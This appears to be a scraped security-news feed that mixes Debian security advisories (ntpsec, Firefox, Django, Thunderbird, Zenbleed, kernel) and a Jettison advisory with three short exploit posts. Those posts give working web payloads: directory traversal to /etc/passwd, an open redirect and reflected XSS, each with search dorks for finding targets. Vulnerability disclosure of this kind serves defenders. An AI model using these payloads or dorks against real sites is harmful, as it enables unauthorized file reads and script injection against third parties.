Debian Linux Security Advisory 5466-1 - It was discovered that ntpd in ntpsec, a secure, hardened, and improved implementation derived from the original NTP project, could crash if NTS is disabled and an NTS-enabled client request (mode 3) is received.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5466-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoAugust 04, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ntpsecCVE ID         : CVE-2023-4012Debian Bug     : 1038422It was discovered that ntpd in ntpsec, a secure, hardened, and improvedimplementation derived from the original NTP project, could crash if NTSis disabled and an NTS-enabled client request (mode 3) is received.For the stable distribution (bookworm), this problem has been fixed inversion 1.2.2+dfsg1-1+deb12u1.We recommend that you upgrade your ntpsec packages.For the detailed security status of ntpsec please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/ntpsecFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTMiPdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0QCoRAAiCGW5caem2KkAZjuk/GUZ6Gd1/FIiyU5rYJQ403XJs3rfB4plt1FiEjMdNy3TpoUXmngXKhuJTmEEtRvCjkP1mw6CytsWqhPAJSPuHznLYsdbm9wUBA3vVec2efb31KXaye3L764GgardYuKSei2i+FtToejls72qFjAxXSPreYaSbTXHUMpTqI31vMpG8fDhijJP3Ax1JSsGOwHxnudg9/WPGrkVnRlJ0VTWxDJchVGGOvUaXyy13quZYI3YK8cBWQVTu7SSVNiEpZ1LxoBTw84mNoDoVCpoW72oNiZGYoA4Ff45JoSQz0mj73Vqd6j2+E8xZdwri/f483XTd+KVbimomSZZ5ks8eE9+X35LZxA7vfdEuhrD0QhVuDO3z7TTqRMhW5aAWjNs27uH6tynxNvw4ShEi0iegLkZH930Q7dHe6CptJvQcemlzdE0teNRlg7+/W+h64QyY7wrqBou+Hkv+lP+gABUfzjS10YwY5ZrzwBdPTvFS7//esIhIf72Mg1FTNJvC2s6TirOnxu90b6JjabAcObBkXDmL/KlEid7Rl67sTvaLV/V+9c6Jy9NXlvyoXvBJJ7cOTkKYok1LowIwvtzEiwFBiZCeA+B4g8rgePL7ZiPOAzUuq7kwDMj5hU+jYfVs2iAcavWpXBIOgryKibn2wNkQW+NxjSMA4==L3OU-----END PGP SIGNATURE-----

Debian Security Advisory 5466-1

Debian Linux Security Advisory 5464-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, bypass of the same-origin policy, spoofing or sandbox bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5464-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 03, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-4045 CVE-2023-4046 CVE-2023-4047 CVE-2023-4048                  CVE-2023-4049 CVE-2023-4050 CVE-2023-4055 CVE-2023-4056Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, bypass of the same-origin policy, spoofing or sandbox bypass.For the oldstable distribution (bullseye), these problems have been fixedin version 102.14.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 102.14.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTL4ygACgkQEMKTtsN8TjZ2nQ//YUyg2nEzvoHNRQHE9ezAxjfXUqkQjS7IEfavk7APQzLq4hvNcnkOab7u6vRimyFObl5o07byVlrDSUUENk7JivvX4HWd7h+CwJAb9Q+XE0qtHMovtbpwlut9nH/C5nUvtVHXok1A33fDvcYTqKX/5fb+v+LkJQudm7k1CIwqJxPyXkgJ8SHFuqBIB2s72mGrKM5Ha+woca17+eI8VhHQwXBgnVQRpxK5AeAUwDchez2Pd9xr6R6RBmziinRfzvo0CPtKp3WqFEDJHUCGx3k/mmlTbN9V4gQM/TZKi2Vr2qM+zvcEvWn684nKEHG6bm+u4EUytxAyFw0FsawsbL3ceJXYwPeddX1C2agW8bkfJgs1Eou33Dl+mu8svG/IrT08C/udNreiWQWIyELZvIZ8RJoKDyqZB6IOtkdDbkH1IzxaciTZRuJGgmj3rGWC02+W2tdoTN1p6GVLF5W0e6GvhYDjB+VVU2MWtqRaaE0l4v8vThHWQmfSHQKwdj8Wil62GumlC1h511SB1p1mQFHtSpBtuHWyZ4Nq3ZACiYfvJlDvq0y1nShE8Ek/CZvyrCm5vMPW1k8UYyNoRyfo239T5/iC9lYF+1A3NqrI3f5se60/lmc5e+TQ/FzG2CAOoVdi8EEdCpNkjyt3jkpZo4942ITTO2GZyzm1E6HQUTBY4do==Co4j-----END PGP SIGNATURE-----

Debian Security Advisory 5464-1

Debian Linux Security Advisory 5465-1 - Seokchan Yoon discovered that missing sanitising in the email and URL validators of Django, a Python web development framework, could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5465-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 03, 2023                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-djangoCVE ID         : CVE-2023-36053Seokchan Yoon discovered that missing sanitising in the email and URLvalidators of Django, a Python web development framework, could resultin denial of service.For the oldstable distribution (bullseye), this problem has been fixedin version 2:2.2.28-1~deb11u2. This update also addresses CVE-2023-23969,CVE-2023-31047 and CVE-2023-24580.For the stable distribution (bookworm), this problem has been fixed inversion 3:3.2.19-1+deb12u1.We recommend that you upgrade your python-django packages.For the detailed security status of python-django please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-djangoFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTMEXoACgkQEMKTtsN8TjYgbA//QyvH70qUWpZtGBT19rQ8JQdcHCdh/FqlsosbYFwKwc+jZNfqyZWr45oMVKQvi8vggxPGXs9LfQb1LhWxsBzhNzCrvN24z7vSqWNensHVBA3NNaGkSDASsIXFZ/LvO0bMjdk0QQ5774CjhoixTBx5SmYy/oapTNeHrZv8geF+E5ga3+r2/lDLNZEfIFFMkfJRhoXuKS/cKKtfDnz37YDr0a8tAXDb/RbGvfu4igjDLWCMnq2aOmx2UaS2euvOlWknhv0r72Skp8ipLx5ykcEJ4WmD3LuNZbXZQNqbsYO9FX2yoXGJqwnuLvTHg/JCnYwrkUEDTcBAY8pbQ/MRM4yIYRxqEnQEyV8HIouajLgFKDtCJCG7Rii/axavcnBiNqgnp8Vg6/F0jKjJOEe4lnVl7xufAQcLTs2aUk9B2WlqKEpAF2xgPc1SdPXetdXy57N2R20Ft3jOS/s2V5YaButrGB0bKa7ktkpSez6Cr9FpNGSSP9G6sjoggRFcDSwHR9FIsX68cHE9DsCVE5J1PLAbJwqQiGl7s1ViDf1Ab4mMmdShPMOWB4mX57wxTcoAdxts6wgjotNwjEwOPEhYOSSAwxjGgeTvs3La4+nrjpFcq7Hg2Ot/FNBq0WsDst/oPfeZ/Lt/teUT36m5crWOovRMAAXKMSpg/KQ8L9b3HDrlwUE==ozYQ-----END PGP SIGNATURE-----

Debian Security Advisory 5465-1

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2022-40149
- https://github.com/jettison-json/jettison/issues/45
- https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538
- https://github.com/jettison-json/jettison/pull/49/files
- https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.1
- https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html
- https://www.debian.org/security/2023/dsa-5312

**Jettison parser crash by stackoverflow**

Moderate severity GitHub Reviewed Published Aug 1, 2023 in tencyle-fixes/jettison • Updated Aug 1, 2023

GHSA-xqcq-j8w9-3pxv: Jettison parser crash by stackoverflow

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

**City Variety LMS 2.2 Cross Site Scripting**

Posted Aug 1, 2023

Authored by indoushka

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 1cbbe0f2970a91c54fd6b773983a7f83c535dbf1c4e56f12913660cbe435877e

Download | Favorite | View

**City Variety LMS 2.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : cityvariety LMS 2.2 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.cityvariety.co.th/                                                                                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf'%22()%26%25<acx><ScRiPt%20>prompt(980997)</ScRiPt>&id=2481&name=[+] https://wwsesaogoth/news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(980997)%3C/ScRiPt%3E&id=2481&name=Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,831)
*   Arbitrary (16,174)
*   BBS (2,859)
*   Bypass (1,738)
*   CGI (1,026)
*   Code Execution (7,261)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,337)
*   DoS (23,388)
*   Encryption (2,369)
*   Exploit (51,723)
*   File Inclusion (4,219)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (855)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,596)
*   Python (1,532)
*   Remote (30,710)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,335)
*   TCP (2,402)
*   Trojan (687)
*   UDP (889)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,634)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,892)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,326)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,644)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,787)
*   UNIX (9,281)
*   UnixWare (186)
*   Windows (6,566)
*   Other

City Variety LMS 2.2 Cross Site Scripting

Debian Linux Security Advisory 5463-1 - A security issue was discovered in Thunderbird, which could result in spoofing of filenames of email attachments.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5463-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 30, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2023-3417A security issue was discovered in Thunderbird, which could result inspoofing of filenames of email attachments.For the oldstable distribution (bullseye), this problem has been fixedin version 1:102.13.1-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1:102.13.1-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTGuwwACgkQEMKTtsN8TjYYQg/9G3hyhs/ad+Risih2ABSgcZna8glNT9zwOY+xWuHDpbRiX1NiNE5rqjgUdhkZOFYbRkON8RnUsM3vodYDA0uBZmh2pXBDg8pmE/b0FGYho+V6/uh6a8bc1HlG4S2E2DMwesof6Fg2iQtkdd2tkPByzKvj/FEs6ZWKa20NIxlVxfb5aaqX/l/WVnwXIzaz6J7hQYWRIjF+TpTgtrX/wl3zM7ZDas1CEWZWWYQ3QSZrA1aTQuOUqq5t7JPbrY1/OAiUrojvCATgaGb0adwlB2Ad6zq4wrJpc99mKpzYKfe6L8VcOYf5jDEHxopE856I/h9UImpBcvHrwbYL/kBetCm0ZFUqCnJlVUBmEPID0DnsYUUbC6v48erfuS0/Fo41knXeowMaCwOeUk6M7AWr2FQmP6S82eNnNs0wbWLcsQ/OV3bchbqZ6hK2bEXrIv3Vi5ZecY6RcJiOfBgvmP9nGsUGAKJC5sKtbBpzwU0NnDskmnubcLh3ak/1S0oBD4nYCYzwQTnqyyaAV1AnRSHfZPk5xpMz7RUNk9zBcfu5kUgbFZ+rCmyCXejhXA5OO4Pggz1SCe/AWrGuJXYVIO2GgL4LroukbDjt3s48TGKH9IuruNF9msjRlWpPTj80khVYn9D68QxIA3Mt36qoTLmm2gFJcu8Cde6XYFWnL4FaKPASqUY==tNnR-----END PGP SIGNATURE-----

Debian Security Advisory 5463-1

Debian Linux Security Advisory 5462-1 - Tavis Ormandy discovered that under specific microarchitectural circumstances, a vector register in AMD "Zen 2" CPUs may not be written to 0 correctly. This flaw allows an attacker to leak sensitive information across concurrent processes, hyper threads and virtualized guests.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5462-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-20593

Tavis Ormandy discovered that under specific microarchitectural  
circumstances, a vector register in AMD "Zen 2" CPUs may not be  
written to 0 correctly.  This flaw allows an attacker to leak  
sensitive information across concurrent processes, hyper threads  
and virtualized guests.

For details please refer to  
<https://lock.cmpxchg8b.com/zenbleed.html> and  
<https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

This issue can also be mitigated by a microcode update through the  
amd64-microcode package or a system firmware (BIOS/UEFI) update.  
However, the initial microcode release by AMD only provides  
updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
also affected, but no updates are available yet.

For the stable distribution (bookworm), this problem has been fixed in  
version 6.1.38-2.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCyRfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Tjjw//SsbN4RnQHqV1G0XVWxApVK1DYoKw6+tHxkkf301jV2abDMcIO1keVNol  
gc2yENQyzeoGd++eBqO0MD9GnvrbutT6n7wChuyvB7bzFDQQA6hJHLcFLkKYA3D1  
6yFgczWL0Tx7wcrpKU9gVMWAe928VE4hJGVd6nFF02YS0GF8voY/ymiCqbuQA05f  
LOmeHNIWyzulBG0qNwQE6HT6s6LkLMCZAawpe3D85cE6exFWRDKJhxKY8GcZvJDV  
8G80Ik1xYAQ6Q5HqwxUr2Rp0sN7a8SghF817Sn/Bx6ahvej61ZTgDn7QhKLkGwu2  
/DOnMcKwKd9WB7gS9T4YLd6rNOPCL4J5P06ia4/JbocExIu19pEEfQvb7gf5PVl3  
994DykFy9ByKiXYh91U9QNyKaBZSjMFeN9Mg8FbbuwZGLLNACkhZc72JK4yKsxTq  
5cucuVBzwbwvvrK63h3YVDyOv8vRiI/jquxOMehsrSGOuaHpd2VduQdnS0ayKjqX  
STOKNRMA+GGjIoNdLyfe9HDlm3ztwsjrxoO0eXqWjUc7EA6KOfsF7NLFju2YXEt9  
80Yr6kCS5/IukkhZBAP4GwV4mLKG1yZ7vzwb15pAihvtw7UFrrzifkcL0yPf7Cx8  
wVtTUdl+5Y4Dfy+i9/LT0sY4fVEKfZZoXnDV733vxTTKKNQSpFk=  
=ceVi  
-----END PGP SIGNATURE-----

Debian Security Advisory 5462-1

Debian Linux Security Advisory 5461-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5461-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-3390 CVE-2023-3610 CVE-2023-20593

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-3610

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    refcount handling on the table and chain destroy path may result in  
    denial of service or privilege escalation.

CVE-2023-20593

    Tavis Ormandy discovered that under specific microarchitectural  
    circumstances, a vector register in AMD "Zen 2" CPUs may not be  
    written to 0 correctly.  This flaw allows an attacker to leak  
    sensitive information across concurrent processes, hyper threads  
    and virtualized guests.

    For details please refer to  
    <https://lock.cmpxchg8b.com/zenbleed.html> and  
    <https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

    This issue can also be mitigated by a microcode update through the  
    amd64-microcode package or a system firmware (BIOS/UEFI) update.  
    However, the initial microcode release by AMD only provides  
    updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
    also affected, but no updates are available yet.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.179-3.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCxhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q2Lw//W7eGT2uTxzgwGK1ivLNtzu4VnZfX3luCzLc2Gy49YhSTPfepMsR+EZWU  
zMfxMwXp7HcgUUAj6VnKPSYt0lmauDVy9POUl20nOzM8hFScemhFJ+DVSeeJrfhR  
RPUroaJNLpJS1QjYJisi2tjKnoc8IhCkw/X88I4S4dAzekmRTLeEdeAIP0jyRYDi  
Pd+nW8vR2bcMG4jAaA/lBu17FgysEpHMleMzr9Ocw7k6eqlcIo12w36Ml51MmXZW  
Lxr7XKrAM6p9TuL+BY0i4FvW0f7hvbpMdhIaAzUf+7LQj9Tn5rGNaHB+NhLO6HB1  
spOXfZLVCM10LDCDIUR3lz0hUNI/10bKtoarbvoygevVzuvGWLTmI5P/uei9Bv1m  
jqd+FOtkZuYsuQzvzIrVISGL2ltpD3055mBaOJWIBrDl+mrR88m+LAMA5iJiCuvh  
M6rfJgraQFHeMFJi1ojDgNyyRaasxOKXRcWAYOvgZ1XKLfJ10OkieYq5CO1c7iKW  
4NkwBklDP8wEHoZHMEY3KnLnGcNO93wBBGcQVIBlMXu0IKlf/BT0Rcj0ynz5g5N1  
MgvGAJio+yTr4QWRz/GQRtF3Lf5r4Ezib/Y2Qv9PUbVWzmmiUyQsATjcp9d+sLSB  
hJhR9+9d4DefRAPGFOSCA6d01qL8HygsvKyyGB4C1DdbSlT3APc=  
=3UcB  
-----END PGP SIGNATURE-----

Tag

#debian